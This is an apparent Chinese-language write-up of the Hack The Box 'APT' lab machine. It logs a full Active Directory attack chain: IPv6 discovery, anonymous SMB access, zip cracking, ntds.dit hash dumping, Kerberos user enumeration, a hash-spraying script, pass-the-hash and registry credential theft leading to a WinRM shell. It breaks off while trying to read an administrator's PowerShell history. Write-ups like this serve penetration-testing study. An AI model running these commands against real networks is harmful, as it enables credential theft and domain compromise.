The first part will explain how to to achieve a remote enumeration of network interfaces on a Windows OS machine without any authentication. We will show that this is done from a RPC method which is held by the IOXIDResolver interface. This interface is part of the DCOM remote object activation. A python script and the methodology to implement such a tool in native code will be delivered.
第一部分将解释如何在 Windows 操作系统计算机上实现网络接口的远程枚举,而无需任何身份验证。我们将展示这是通过 IOXIDResolver 接口持有的 RPC 方法完成的。该接口是 DCOM 远程对象激活的一部分。将提供 python 脚本以及以本机代码实现此类工具的方法。
The second part will explain why such RPC is used inside a DCOM environment. This involves diving into the OXID Resolver component. The latter requires to understand some DCOM concepts such as transparency, marshalling and object reference. This part will be described in the next blog post.
第二部分将解释为什么在 DCOM 环境中使用这种 RPC。这涉及深入研究 OXID Resolver 组件。后者需要理解一些 DCOM 概念,例如透明度、编组和对象引用。这部分将在下一篇博客文章中描述。
解析出隐藏的ipv6地址
大致浏览文章,和我们遇到的情况很相似,这里用到的工具来自于https://github.com/mubix/IOXIDResolver ,尝试利用:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# python3 IOXIDResolver.py -h
IOXIDResolver.py -t <target>
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# python3 IOXIDResolver.py -t 10.129.96.60
[*] Retrieving network interface of 10.129.96.60
Address: apt
Address: 10.129.96.60
Address: dead:beef::10b
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::f9e3:e61a:564f:3e8a
信息搜集
观察结果,我们发现该解析器将目标ip的ipv6地址给解析出来了!这是一个重要的信息,接下来就需要验证这些ipv6地址的有效性,先将这些地址保存。我们依然可以通过nmap对这些新地址进行扫描,与常规扫描端口思路一样:
ipv6 tcp全端口扫描
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f -oA nmapscan/6tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:17 CST
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.38s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49675/tcp open unknown
49698/tcp open unknown
54047/tcp open unknown
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# tcports6=$(grep open nmapscan/6tcports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
echo $tcports6
53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047
ipv6 tcp详细扫描
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 -sT -sC -sV -O -p53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047 dead:beef::b885:d62a:d679:573f -oA nmapscan/6tc
pdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:27 CST
sendto in send_ipv6_ipproto_raw: sendto(10, packet, 80, 0, dead:beef::b885:d62a:d679:573f, 28) => Operation not permitted
Offending packet: ICMPv6 (58) dead:beef:2::100d > dead:beef::b885:d62a:d679:573f (type=128/code=0) hopl=55 flow=12345 payloadlen=40
Unable to send packet in probe_transmission_handler: Operation not permitted (1)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-07 08:27:29Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
|_ssl-date: 2024-03-07T08:28:41+00:00; -27s from scanner time.
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
|_ssl-date: 2024-03-07T08:28:40+00:00; -28s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2024-03-07T08:28:41+00:00; -27s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
54047/tcp open msrpc Microsoft Windows RPC
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows Vista|7|2008 R2|2012 R2 (96%)
OS CPE: cpe:/o:microsoft:windows_vista::sp2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_20
12:r2
OS fingerprint not ideal because: Some probes failed to send so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -27s, deviation: 1s, median: -27s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-03-07T08:28:26
|_ start_date: 2024-03-07T05:58:50
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: apt
| NetBIOS computer name: APT\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: apt.htb.local
|_ System time: 2024-03-07T08:28:27+00:00
ipv6 udp端口扫描
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 -sU --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f -oA nmapscan/6udports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:23 CST
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.18s latency).
All 65535 scanned ports on dead:beef::b885:d62a:d679:573f are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
ipv6 脚本漏扫
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 --script=vuln -p53,80,88,135,389,445,464,593,636,3268,5985,9389,47001,49665,49666,49667,49669,49670,49698,54047 dead:beef::b885:d62a:d679:573f -oA nmapscan/6vul
n
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 16:35 CST
Stats: 0:03:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 16:38 (0:00:00 remaining)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.24s latency).
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49698/tcp open unknown
54047/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
扫描结果分析
观察结果,很明显这些是域名控制器的典型端口特征,将扫描到的域名添加到host
文件中,80、135、445、593这些端口优先尝试利用,访问ipv6对应的web服务,发现和ipv4时一样,因此不考虑
尝试获取ipv6 smb共享
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbclient -L //htb.local
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
backup Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
htb.local is an IPv6 address -- no workgroup available
# Obviously, what is most interested in us is backup
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbclient //htb.local/backup
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Sep 24 15:30:52 2020
.. D 0 Thu Sep 24 15:30:52 2020
backup.zip A 10650961 Thu Sep 24 15:30:32 2020
5114623 blocks of size 4096. 2634678 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (577.5 KiloBytes/sec) (average 577.5 KiloBytes/sec)
# try others:
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient //htb.local/IPC$
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient //htb.local/NETLOGON
Password for [WORKGROUP\root]:
Anonymous login successful
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
smb: \> exit
┌──(root㉿hunter)-[/home/…/htb/APT/backup/registry]
└─# smbclient //htb.local/SYSVOL
Password for [WORKGROUP\root]:
Anonymous login successful
tree connect failed: NT_STATUS_CONNECTION_RESET
# Obviously, there are very large value files, but unfortunately, they have been encrypted, and they come from a backup file, so maybe they are not latest.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -l backup.zip
Archive: backup.zip
Length Date Time Name
--------- ---------- ----- ----
0 2020-09-23 19:40 Active Directory/
50331648 2020-09-23 19:38 Active Directory/ntds.dit
16384 2020-09-23 19:38 Active Directory/ntds.jfm
0 2020-09-23 19:40 registry/
262144 2020-09-23 19:22 registry/SECURITY
12582912 2020-09-23 19:22 registry/SYSTEM
--------- -------
63193088 6 files
# Obviously,they are safe, we dont need to continue to analyze deeply.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -d backup backup.zip
Archive: backup.zip
creating: backup/Active Directory/
[backup.zip] Active Directory/ntds.dit password:
skipping: Active Directory/ntds.dit incorrect password
skipping: Active Directory/ntds.jfm incorrect password
creating: backup/registry/
skipping: registry/SECURITY incorrect password
skipping: registry/SYSTEM incorrect password
尝试破解zip
John the Ripper 要求密码哈希采用特定格式。首先要将 ZIP 文件的密码哈希转换为适当的格式,使用 John the Ripper 附带的 zip2john 实用程序
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# zip2john backup.zip > zip.hash
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB ts=9CCA cs=acd0 type=8
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785 ts=9CCA cs=2a39 type=8
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3 ts=9AC6 cs=9beb type=8
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD ts=9AC6 cs=65d9 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2024-03-09 10:30) 20.00g/s 819200p/s 819200c/s 819200C/s 123456..loserface1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# unzip -d backup backup.zip
Archive: backup.zip
creating: backup/Active Directory/
[backup.zip] Active Directory/ntds.dit password:
inflating: backup/Active Directory/ntds.dit
inflating: backup/Active Directory/ntds.jfm
creating: backup/registry/
inflating: backup/registry/SECURITY
inflating: backup/registry/SYSTEM
很快,我们破解成功了
关于ntds.dit:
NTDS.DIT 在 Active Directory 中至关重要。它充当所有域对象及其相关信息的集中存储库。对域所做的任何更改(例如创建新用户帐户、修改组成员身份或更新用户属性)都会反映在 NTDS.DIT 文件中。该文件充当整个域的单一事实来源,从而实现高效的管理和身份验证过程。简单来说,只要成功读取并解析该文件的内容,我们可以获取到域内的hash信息,当破解成功hash,这就相当于获取了整个域的控制权,并且重要的是,这些密码的提取和破解可以离线执行,因此它们将无法被检测到,一旦攻击者提取了这些哈希值,他们就可以充当域中的任何用户。
secretsdump读取ntds.dit
secretsdump
同样来自于优秀的impacket
库,用来读取ntds.dit
非常合适
┌──(root㉿hunter)-[/home/…/htb/APT/backup/Active Directory]
└─# export PATH=/usr/share/doc/python3-impacket/examples:$PATH
┌──(root㉿hunter)-[/home/…/htb/APT/backup/Active Directory]
└─# secretsdump.py -ntds ./ntds.dit -system ../registry/SYSTEM LOCAL > ../../user_hash_raw
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw| wc -l
8005
# so much data!So we need to extract the hash with the account password, and then try to collide,that is, it ends with ":::".
# At this stage, if this is in a real offensive and defensive environment, we can first directly try to use the hash of administrator to transmit and connect to winrm. There is a probability of success, but this is a target plane, so it can not be so easy.
开始处理数据:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw| grep ':::' | awk -F':' '{print $1}' | sort -u > user_list
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# cat user_hash_raw| grep ':::' | awk -F':' '{print $3,$4}' | sed 's/ /:/g' > user_list
利用pre-authentication机制验证用户和hash有效性
从上面我们知道获取到的hash和用户分别都是2000行数据,如果我们要直接用hash碰撞,这样的数据量组合非常大,很影响效率,因此在这之前,我们必须先筛选出有效的用户,减少不必要的工作量。我们可以利用DC的
pre-authentication
机制,通过返回信息的不同来识别出哪些用户是有效的,工具kerbrute
可以帮助我们实现
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# kerbrute userenum -d htb.local --dc htb.local ./user_list
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/09/24 - Ronnie Flathers @ropnop
2024/03/09 11:49:52 > Using KDC(s):
2024/03/09 11:49:52 > htb.local:88
2024/03/09 11:50:03 > [+] VALID USERNAME: Administrator@htb.local
2024/03/09 11:51:09 > [+] VALID USERNAME: APT$@htb.local
2024/03/09 11:57:38 > [+] VALID USERNAME: henry.vinson@htb.local
2024/03/09 12:08:08 > Done! Tested 2000 usernames (3 valid) in 1096.093 seconds
事实上,不仅仅只有这种方式,我们还可以利用nmap的脚本:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# nmap -6 -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='htb.local',userdb=user_list htb.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-09 11:53 CST
Stats: 0:01:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 43.78% done; ETC: 11:56 (0:01:40 remaining)
Nmap scan report for htb.local (dead:beef::b885:d62a:d679:573f)
Host is up (0.21s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| Administrator@htb.local
| henry.vinson@htb.local
|_ APT$@htb.local
Nmap done: 1 IP address (1 host up) scanned in 173.48 seconds
其中, APT$
这个用户的命名结构很特别,显然是个隐藏用户,一般隐藏用户用于某些系统级别的功能,所以它也具有一定的利用价值。筛选出了有效用户,显然下一步应该是尝试hash碰撞,用2000个hash碰撞这三个有效用户,如果有碰撞成功的一对组合,我们就可以获取到了立足点。
尝试hash碰撞
crackmapexec
工具也可以用于hash碰撞,需要指定利用的协议,由信息搜集的结果来看,我们只能通过这三个协议:
优先选择
smb
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# crackmapexec smb htb.local -u usr_effective -H hash_list
SMB htb.local 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:9ea25adafeec63e38cef4259d3b15c30 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:3ae49ec5e6fed82ceea0dc2be77750ab STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:531c98e26cfa3caee2174af495031187 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:fde29e6cb61b4f7fda1ad5cd2759329d STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:51d368765462e9c5aebc456946d8dc86 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:273c48fb014f8e5bf9e2918e3bf7bfbd STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:98590500f99a1bee7559e97ad342d995 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:10cf01167854082e180cf549f63c0285 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB htb.local 445 APT [-] htb.local\Administrator:aad3b435b51404eeaad3b435b51404ee:6149000a4f3f7c57642cbee1ea70c3e1 STATUS_LOGON_FAILURE
SMB htb.local 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB htb.local 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB htb.local 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
。。。
我们发现在尝试过几次碰撞后,提示连接超时,然后报错,重新执行后依然是同样的情况,说明此时我们很有可能触发了服务器的防护措施,尝试一定的次数后失败会被拦截,并且我们的ip有可能会被封锁
既然这个工具执行后会被拦截,我们再尝试其他的,比如impacket
库的getTGT.py
,这是用来获取TGT
的,但是在执行过程中是会获取到匹配成功的hash,不过我们需要再写一个自动化脚本getTGT_auto.sh
配合它:
#!/bin/bash
while IFS='' read -r LINE || [ -n "${LINE}" ]
do
echo "-----------------------"
echo "Feed the Hash:${LINE}"
/usr/share/doc/python3-impacket/examples/getTGT.py htb.local/henry.vinson@htb.local -hashes ${LINE}
done < hash_list
先尝试碰撞一个用户,如果不成功,再尝试其他用户。当成功获取到TGT
时,会生成一个.ccache
文件,因此,我们还需要执行一个监控命令watch
监控什么时候生成该文件,当生成时我们就可以手动中断脚本的执行:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# watch "ls -ltr | tail -2"
一段时间后,我们找到了:
。。。
-----------------------
Feed the Hash:aad3b435b51404eeaad3b435b51404ee:945f05a17a39217a6a8b58e9bd26ee46
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
-----------------------
Feed the Hash:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in henry.vinson@htb.local.ccache
。。。
保存好该匹配成功的hash,观察这个hash的结构,LM
部分是aad3b435...
,这是空密码编码后的固定编码,当我们拿到一组有效的用户hash,先立即尝试是否能横向迁移
hash传递-尝试横向迁移
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# evil-winrm -i htb.local -u henry.vinson -H 'e53d87d42adaa3ca32bdb34a876cbffb'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Requesting shares on htb.local.....
[-] share 'backup' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
注册表泄漏敏感信息
通过以上常用的横向迁移方式,我们都没有成功,我们还可以尝试impacket
库中的reg.py
看看能不能获取到注册表,虽然严格来说这通常不是用于横向迁移的,但当常用的横向迁移手段都无法取得进展时,应该想到这个思路:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\
HKU\\Console
HKU\\Control Panel
HKU\\Environment
HKU\\Keyboard Layout
HKU\\Network
HKU\\Software
HKU\\System
HKU\\Volatile Environment
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software
HKU\Software\GiganticHostingManagementSystem
HKU\Software\Microsoft
HKU\Software\Policies
HKU\Software\RegisteredApplications
HKU\Software\Sysinternals
HKU\Software\VMware, Inc.
HKU\Software\Wow6432Node
HKU\Software\Classes
# Look at the familiar name, which is exactly the same as the one shown on the website. Obviously, this is what we want.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\GiganticHostingManagementSystem
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\GiganticHostingManagementSystem
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#Ny5@2dvht
# This exposes credential information!
我们获取到了一组凭据,并且还有可能是某个管理员,接下来尝试该凭据是否有效:
获取立足点
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/APT]
└─# evil-winrm -i htb.local -u henry.vinson_adm -p G1#Ny5@2dvht
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami
htb\henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> cat user.txt
0b3df55f82208fb1a9593113a8eac7d2
后渗透信息搜集
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> cd ../../
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2020 7:54 AM Administrator
d----- 9/24/2020 8:39 AM henry.vinson
d----- 9/24/2020 8:40 AM henry.vinson_adm
d-r--- 11/21/2016 2:39 AM Public
# After trying to enumerate the contents of all directories again, there is no valuable information or permissions.
尝试枚举出敏感信息文件
这里需要用到一个非常常用的敏感文件枚举目录,项目在:
https://github.com/carlospolop/Auto_Wordlists/
我们可以利用其中的文件包含漏洞字典:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
直接在浏览器中筛选几个常用的关键词:
passwd
history
结合获取到的所有信息进行分析,筛选,我们最终怀疑最有可能存在以下敏感文件:
通过尝试,果然我们发现了这个敏感文件,并且能够读取它的内容:
*Evil-WinRM* PS C:\Program files> cat c:/users/administrator/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
Access is denied
At line:1 char:1
+ cat c:/users/administrator/appdata/roaming/microsoft/windows/powershe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\users\admini...ost_history.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
Cannot find path 'C:\users\administrator\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt' because it does not exist.
At line:1 char:1
+ cat c:/users/administrator/appdata/roaming/microsoft/windows/powershe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\users\admini...ost_history.txt:String) [Get-Content], ItemNotFoundException
